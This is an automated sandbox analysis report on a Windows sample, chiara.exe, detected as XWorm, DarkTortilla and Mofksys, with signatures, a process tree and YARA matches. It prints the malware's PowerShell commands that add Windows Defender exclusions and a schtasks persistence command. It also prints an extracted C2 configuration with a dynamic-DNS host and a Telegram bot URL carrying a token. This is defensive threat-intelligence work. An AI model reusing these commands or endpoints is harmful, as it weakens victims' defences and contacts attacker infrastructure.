Edit tour

Windows Analysis Report
chiara.exe

Overview

General Information

Sample name:	chiara.exe
Analysis ID:	1502918
MD5:	1c8c35c728f0ac7906153a4da2244a74
SHA1:	ddc216572b1dc8d61f16639e74aceb7b5bf18bab
SHA256:	1707efe35749f4477db431f041481a46dd48d22431e6846f4e13bff760dc4033
Infos:

Detection

CryptOne, DarkTortilla, Mofksys, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected CryptOne packer

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected Mofksys

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Protects its processes via BreakOnTermination flag

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SGDT)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

chiara.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\chiara.exe" MD5: 1C8C35C728F0AC7906153A4DA2244A74)

chiara.exe (PID: 1892 cmdline: c:\users\user\desktop\chiara.exe MD5: BDEBF3879721FD16DBC911F31C675AB9)

shost.exe (PID: 744 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe" MD5: 7F2742F64322B2D1F9D5EBB7AA83E49A)

InstallUtil.exe (PID: 7472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 7480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 7624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 7744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

powershell.exe (PID: 7976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Logon Application.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icsys.icn.exe (PID: 6764 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: 4D76C5FFDB96E3DFCAFB57DA763E9D31)

explorer.exe (PID: 6300 cmdline: c:\windows\resources\themes\explorer.exe MD5: BB11F2754E3A66599975C5F2EEBC8B6D)

spoolsv.exe (PID: 5900 cmdline: c:\windows\resources\spoolsv.exe SE MD5: 1E8FD9AB3425B7B8E99567C3A820C372)

svchost.exe (PID: 7116 cmdline: c:\windows\resources\svchost.exe MD5: A92C1525A326CEB946667E8533099E63)

spoolsv.exe (PID: 7276 cmdline: c:\windows\resources\spoolsv.exe PR MD5: 1E8FD9AB3425B7B8E99567C3A820C372)

svchost.exe (PID: 5656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

explorer.exe (PID: 7640 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: BB11F2754E3A66599975C5F2EEBC8B6D)

svchost.exe (PID: 5152 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

explorer.exe (PID: 7724 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: BB11F2754E3A66599975C5F2EEBC8B6D)

consent.exe (PID: 7784 cmdline: consent.exe 5152 322 0000013E5E228840 MD5: DD5032EF160209E470E2612A8A3D5F59)

svchost.exe (PID: 7816 cmdline: "C:\windows\resources\svchost.exe" RO MD5: A92C1525A326CEB946667E8533099E63)

svchost.exe (PID: 7776 cmdline: "C:\windows\resources\svchost.exe" RO MD5: A92C1525A326CEB946667E8533099E63)

Windows Logon Application.exe (PID: 6548 cmdline: "C:\Users\user\AppData\Roaming\Windows Logon Application.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Windows Logon Application.exe (PID: 3536 cmdline: "C:\Users\user\AppData\Roaming\Windows Logon Application.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Windows Logon Application.exe (PID: 2076 cmdline: "C:\Users\user\AppData\Roaming\Windows Logon Application.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Mofksys		No Attribution	https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/	https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["mariona.duckdns.org"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "transferdriver.exe", "Telegram URL": "https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
chiara.exe	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Windows\Resources\svchost.exe	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
C:\Windows\Resources\Themes\explorer.exe	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
C:\Windows\Resources\spoolsv.exe	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
C:\Windows\Resources\Themes\icsys.icn.exe	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000000.2182852685.0000000000401000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000016.00000002.2264439657.0000000000401000.00000080.00000001.01000000.00000013.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000000.00000000.2001681199.0000000000401000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000008.00000000.2028860171.0000000000401000.00000080.00000001.01000000.00000013.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000003.00000000.2008195461.0000000000401000.00000080.00000001.01000000.00000008.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000011.00000002.2182972944.0000000000401000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000014.00000000.2195592157.0000000000401000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x34b73:$s4: Stub.exe 0x53bda:$s4: Stub.exe 0x53c52:$s4: Stub.exe 0x5e853:$s4: Stub.exe 0x7d8ba:$s4: Stub.exe 0x7d932:$s4: Stub.exe 0x88523:$s4: Stub.exe 0xa758a:$s4: Stub.exe 0xa7602:$s4: Stub.exe 0x3a013:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x63cf3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8d9c3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3a0b0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x63d90:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8da60:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3a1c5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x63ea5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8db75:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3966d:$cnc4: POST / HTTP/1.1 0x6334d:$cnc4: POST / HTTP/1.1 0x8d01d:$cnc4: POST / HTTP/1.1
00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2577651700.00000000059D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa449:$s4: Stub.exe 0xf8e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf986:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfa9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xef43:$cnc4: POST / HTTP/1.1
0000000B.00000002.2572034544.00000000043CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000018.00000000.2272315679.0000000000401000.00000080.00000001.01000000.00000013.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000014.00000002.2197703621.0000000000402000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000C.00000002.2074461666.0000000000402000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2572034544.000000000453F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000003.00000002.2078868088.0000000000402000.00000080.00000001.01000000.00000008.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000004.00000002.3257810116.0000000000402000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000007.00000002.2077929477.0000000000402000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000016.00000000.2264228673.0000000000401000.00000080.00000001.01000000.00000013.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaea3:$s4: Stub.exe 0x29f0a:$s4: Stub.exe 0x29f82:$s4: Stub.exe 0x34b61:$s4: Stub.exe 0x53bc8:$s4: Stub.exe 0x53c40:$s4: Stub.exe 0x10343:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3a001:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x103e0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3a09e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x104f5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3a1b3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf99d:$cnc4: POST / HTTP/1.1 0x3965b:$cnc4: POST / HTTP/1.1
00000018.00000002.2275043598.0000000000402000.00000080.00000001.01000000.00000013.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000004.00000000.2016360803.0000000000401000.00000080.00000001.01000000.0000000D.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2744d:$s4: Stub.exe 0x2c8ed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c98a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2ca9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2bf47:$cnc4: POST / HTTP/1.1
00000017.00000003.2270943066.00000236016E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
00000007.00000000.2026328505.0000000000401000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000C.00000000.2061337651.0000000000401000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10347d:$s4: Stub.exe 0x131739:$s4: Stub.exe 0x10891d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x136bd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1089ba:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x136c76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x108acf:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x136d8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x107f77:$cnc4: POST / HTTP/1.1 0x136233:$cnc4: POST / HTTP/1.1
Process Memory Space: chiara.exe PID: 6292	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: icsys.icn.exe PID: 6764	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: explorer.exe PID: 6300	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: spoolsv.exe PID: 5900	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: svchost.exe PID: 7116	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: shost.exe PID: 744	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: shost.exe PID: 744	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: shost.exe PID: 744	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: shost.exe PID: 744	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: spoolsv.exe PID: 7276	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: InstallUtil.exe PID: 7472	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: explorer.exe PID: 7640	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: explorer.exe PID: 7724	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: svchost.exe PID: 7776	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: consent.exe PID: 7784	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Process Memory Space: svchost.exe PID: 7816	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.spoolsv.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
3.0.icsys.icn.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
24.0.svchost.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
17.0.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
7.2.spoolsv.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
17.2.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.477b518.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.477b518.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.shost.exe.477b518.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1
22.2.svchost.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.475185a.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.475185a.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8849:$s4: Stub.exe 0x264b0:$s4: Stub.exe 0x26528:$s4: Stub.exe 0xdce9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xde9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd343:$cnc4: POST / HTTP/1.1
22.0.svchost.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
4.0.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.46aa52a.6.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.46aa52a.6.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8849:$s4: Stub.exe 0x264b0:$s4: Stub.exe 0x26528:$s4: Stub.exe 0xdce9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xde9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd343:$cnc4: POST / HTTP/1.1
3.2.icsys.icn.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.46fdeda.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.46fdeda.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8849:$s4: Stub.exe 0x264b0:$s4: Stub.exe 0x26528:$s4: Stub.exe 0xdce9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xde9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd343:$cnc4: POST / HTTP/1.1
0.2.chiara.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.46d420a.5.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
